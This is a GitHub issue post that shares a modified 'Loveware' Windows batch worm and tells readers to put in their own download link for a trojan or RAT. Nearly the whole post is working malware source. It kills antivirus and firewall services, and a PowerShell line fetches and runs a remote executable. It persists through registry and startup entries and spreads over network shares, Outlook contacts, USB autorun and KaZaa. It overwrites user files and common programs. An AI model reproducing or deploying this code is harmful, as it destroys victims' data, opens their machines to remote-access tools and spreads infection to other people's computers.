Open Twobit666 opened 11 months ago
Edited the code so the worm still exists but the destruction isnt as bad... also added code that will download a custom file (trojan, rat etc) IMPORANT: Once you find this part of the code:
:: Download custom file virus rat etc powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}"
please change https://example.com/Example.exe to ur own link (direct download) change Example.exe to your file name
@echo off :: THIS VERSION CAN CONTAIN BUGS :: :: LOVEWARE v9.4 :: :: :: Name: Loveware :: Creator: Da2dalus :: What is this in gods name?!: :: This is a worm that will mess up your computer! :: BTW It is community driven!!! :) :: ____________________________________________________ :: |___________________MALWARE CLASS____________________| :: |TYPE______|ANSWER___________________________________| :: |LOVELETTER|YES THIS IS A LOVELETTER BASED SOFTWARE | :: |Spyware |NO | :: |Trojan |YOU CAN CHOOSE | :: |Email worm|YES | :: |Net worm |YES | :: |XSS worm |NOT THERE YET ;) | :: |Adware |NO | :: |RAT |I AM NOT SO BAD | :: |Backdoor |PROBABLY NOT ;) (NO) | :: |YOUR DOOM!|DEFINETLY!!!!!!!!!! | :: :: IF YOU FIX A BUG OR ADD SOMETHING NEW TO THE SOFTWARE :: YOUR NAME WILL APPEAR HERE: :: ______________________________ :: |MEMBERS_______________________| :: |Da2dalus__________|CREATOR____| :: |a11y-spec_________|CONTRIBUTOR| :: |__________________|___________| :: |__________________|___________| :: |__________________|___________| :: :: Notes: :: This software needs to be converted to exe :: (add "invisible startup for better preformance"). :: Please send me a message on github or in the Issuses tab of this repo on github :: https://github.com/Da2dalus/Loveware :: if you find any bugs or if you have :: a good idea about something we can add to this software. :: Disclamer: :: I am not responsible for the damage caused by this software. :: :: ,--, :: ,---.'| :: | | : :: : : | :: | ' : ,---. .---. __ ,-. :: ; ; ' ' ,'\ .---. /. ./| ,' ,'/ /| :: ' | |__ / / | /. ./| ,---. .-'-. ' | ,--.--. ' | |' | ,---. :: | | :.'|. ; ,. : .-' . ' | / \ /___/ \: | / \ | | ,'/ \ :: ' : ;' | |: :/___/ \: |/ / | .-'.. ' ' ..--. .-. |' : / / / | :: | | ./ ' | .; :. \ ' . ' / |/___/ \: ' \__\/: . .| | ' . ' / | :: ; : ; | : | \ \ ' ; /|. \ ' .\ ," .--.; |; : | ' ; /| :: | ,/ \ \ / \ \ ' | / | \ \ ' \ |/ / ,. || , ; ' | / | :: '---' `----' \ \ | : | \ \ |--"; : .' \---' | : | :: '---" \ \ / \ \ | | , .-./ \ \ / :: `----' '---" `--`---' `--- :: DO NOT UPLOAD ON VIRUSTOTAL!!! :: color 57 title Loveware :: Only run as admin function :admin net session >nul 2>&1 if %errorLevel% == 0 ( goto runner ) else ( echo msgbox("Please run as admin",0+64,"Admin") > C:\Windows\Admin.vbs start C:\Windows\Admin.vbs pause exit ) :runner :: Disable antivirus, firewall, taskmanager... net stop "SDRSVC" net stop "WinDefend" taskkill /f /t /im "MSASCui.exe" net stop "security center" netsh firewall set opmode mode-disable net stop "wuauserv" net stop "Windows Defender Service" net stop "Windows Firewall" net stop sharedaccess del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.dat del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* :: Change file name to Client RENAME %0 Client.exe :: Move Client to the windows directory MOVE /e /y Client.exe C:\Windows :: Set up local environment setlocal :: Get the current user's username for /f "tokens=*" %%a in ('whoami') do set "currentUser=%%a" :: Download custom file virus rat etc powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('https://example.com/Example.exe', [System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe')); Start-Sleep -Seconds 45; Start-Process ([System.IO.Path]::Combine($env:LOCALAPPDATA, 'Temp\Example.exe'))}" :: End local environment endlocal :: Copy Client to the startup XCOPY "Client.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup" :: Infect network connected computers @echo off > service.bat SET "NomeProcesso=Client.exe" >> service.bat SET "NomeService=Client" >> service.bat echo sc create %NomeService% binpath=%0 >> service.bat echo sc start %NomeService% >> service.bat attrib +h +r +s service.bat start service.bat SET i=0 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0 attrib +h +r +s %0 :Internet net use Z: \\192.168.1.%i%\C$ if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe" mountvol Z: /d) if %i% == 256 (goto Infect) else (set /a i=i+1) goto worm goto Internet :Infect for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe) for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f) goto Infect :: Send Client to all the contacts of the user :: with outlook :worm set Slash=\ if exist %SystemDrive%%Slash%AUTOEXEC.BAT ( del %SystemDrive%%Slash%AUTOEXEC.BAT copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT ) set a=Client copy %0 %windir%\%a%.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul set b=Loveware copy %0 %windir%\%b%.exe echo [windows] >> %windir%\win.ini echo run=%windir%\%b%.exe >> %windir%\win.ini echo load=%windir%\%b%.exe >> %windir%\win.ini echo [boot] >> %windir%\system.ini echo shell=explorer.exe %b%.exe >> %windir%\system.ini echo dim x>>%SystemDrive%\mail.vbs echo on error resume next>>%SystemDrive%\mail.vbs echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs echo Set Mail=ci>>%SystemDrive%\mail.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs echo Mail.send>>%SystemDrive%\mail.vbs echo Next>>%SystemDrive%\mail.vbs echo ol.Quit>>%SystemDrive%\mail.vbs start "" "%SystemDrive%\mail.vbs" goto run2 goto worm :: Infect autoexec.bat :run2 set Slash=\ if exist %SystemDrive%%Slash%AUTOEXEC.BAT ( attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT del %SystemDrive%%Slash%AUTOEXEC.BAT copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT ) set a=Client copy %0 %windir%\%a%.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul copy %0 "%userprofile%\Start Menu\Programs\Startup" set b=Loveware copy %0 %windir%\%b%.exe echo [windows] >> %windir%\win.ini echo run=%windir%\%b%.exe >> %windir%\win.ini echo load=%windir%\%b%.exe >> %windir%\win.ini echo [boot] >> %windir%\system.ini echo shell=explorer.exe %b%.exe >> %windir%\system.ini :: Create autorun file echo [autorun] > windows.inf echo ;open=Client.exe >> windows.inf echo ShellExecute=Client.exe >> windows.inf echo UseAutoPlay=1 >> windows.inf :: Copy windows.inf to usb xcopy /e /y windows.inf D:\ xcopy /e /y windows.inf E:\ xcopy /e /y windows.inf F:\ xcopy /e /y windows.inf G:\ xcopy /e /y windows.inf H:\ :: Copy loveware to usb drives xcopy /e /y Client.exe D:\ xcopy /e /y Client.exe E:\ xcopy /e /y Client.exe F:\ xcopy /e /y Client.exe G:\ xcopy /e /y Client.exe H:\ :: Use KaZaa to spread if the user has this ancient stuff if exist C:\Program Files\KaZaa\My Shared Folder\ ( xcopy Client.exe C:\Program Files\KaZaa\My Shared Folder\list.doc.exe goto key ) else ( goto key ) :key :: Infect different files: lnk, mp3, doc, pdf.... assoc .lnk=batfile DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k" assoc .doc=batfile DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k" assoc .txt=batfile DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k" assoc .pdf=batfile DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k" assoc .xml=batfile DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k" assoc .mp3=batfile DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k" assoc .mp4=batfile DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k" assoc .png=batfile DIR /S/B %SystemDrive%\*.png >> InfList_png.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k" :: Send message to other users :haha msg * "I Love You!" net send * "I Love You" goto run3 goto haha :run3 :: Overwrite some programs and taskmanager for extra fun tskill pbrush copy /y Client.exe C:\Windows\pbrush.exe tskill excel copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE" tskill mspaint copy /y Client.exe "%windir%\system32\mspaint.exe" tskill WINWORD copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE" tskill calc copy /y Client.exe "%windir%\system32\calc.exe tskill msaccess copy /y Client.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE" tskill iexplore copy /y Client.exe "C:\Program Files\Internet Explorer\iexplore.exe" tskill safari copy /y Client.exe "C:\Program Files\Safari\Safari.exe" tskill brave copy /y Client.exe "C:\Program Files\BraveSoftware\Brave-Browser\Application\Brave.exe" tskill Firefox copy /y Client.exe "C:\Program Files\Mozilla Firefox\firefox.exe" :: Put on some music start /min https://www.youtube.com/watch?v=XpqqjU7u5Yc :: ..... ..... :: ,ad8PPPP88b, ,d88PPPP8ba, :: d8P" "Y8b, ,d8P" "Y8b :: dP' "8a8" `Yd :: 8( " )8 :: I8 CODED WITH LOVE 8I :: Yb, BY THE LOVEWARE ,dP :: "8a, TEAM ,a8" :: "8a, ,a8" :: "Yba adP" :: `Y8a a8P' :: `88, ,88' :: "8b d8" :: "8b d8" :: `888' :: " :: :: :: PLEASE DO NOT COPY THE LOVEWARE CODE AND RENAME IT :: THAT'S NOT CREATING THAT IS STEALING. :: THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE :: DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT :: ANTI VIRUS DETECTION. :: I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY :: THIS SOFTWARE! :: :: THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT :: AND SUPPORTED IT :: :: NEW VERSIONS WILL BE COMING SOON (I HOPE) :: :: Greetings from the LOVEWARE TEAM
Edited the code so the worm still exists but the destruction isnt as bad... also added code that will download a custom file (trojan, rat etc) IMPORANT: Once you find this part of the code:
please change https://example.com/Example.exe to ur own link (direct download) change Example.exe to your file name